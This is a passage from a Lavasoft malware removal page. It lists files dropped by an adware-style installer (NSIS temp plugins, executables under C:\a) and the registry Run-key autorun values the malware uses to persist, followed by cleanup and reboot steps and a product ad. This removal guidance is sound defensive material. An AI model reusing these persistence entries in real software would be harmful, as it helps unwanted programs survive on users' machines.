    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns98.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns70.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns39.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns73.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAE.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns30.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB4.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns18.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns27.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns79.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns37.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns69.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns71.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns94.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA7.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns63.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns44.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns23.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\vchk[1].htm (1885 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns87.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns47.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns12.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns14.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB2.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns24.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns90.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns62.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns92.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns72.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns56.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns77.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns65.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns17.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns55.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns80.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns89.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB7.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA4.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns19.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns57.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns61.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns64.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns22.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\desktop.ini (67 bytes)
    C:\a\loogg2.txt (240 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\desktop.ini (67 bytes)
    C:\a\logff.txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\desktop.ini (67 bytes)
    C:\a\FiddlerCore.dll (9485 bytes)
    C:\a\zuur.txt (2 bytes)
    C:\a\internetport3.exe (10 bytes)
    C:\a\wcheckf.exe (397 bytes)
    C:\a\zhho.txt (3 bytes)
    C:\a\zvchk.txt (3 bytes)
    C:\a\EG9650tGGrxO3Eyr78zW.exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\AccessControl.dll (13 bytes)
    %Program Files%\FastInternet\app.exe (1078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\bdcount[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\uniqueEG9650tGGrxO3Eyr78zW[1].htm (10 bytes)
    C:\a\winonit.exe (435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\EG9650tGGrxO3Eyr78zW[1].exe (3808 bytes)
    C:\a\ayyyyy.txt (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UAC.dll (13 bytes)
    C:\a\ukey.ini (27 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\pwgen.dll (17 bytes)
    C:\a\uniqueEG9650tGGrxO3Eyr78zW.ini (10 bytes)
    C:\a\zvv.txt (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\cki[1].htm (11 bytes)
    C:\a\ver.ini (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\SimpleFC.dll (5289 bytes)
    C:\a\getcap.exe (10027 bytes)
    C:\a\5ddzT3JjRl.exe (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (11 bytes)
    %Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
    C:\a\wincheckfe.exe (778 bytes)
    C:\a\72870850.bat (287 bytes)
    %System%\73581819.bat (19 bytes)
    C:\a\install.txt (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "autoauto" = "73581819.bat"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "rutoauto" = "73581819.bat"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now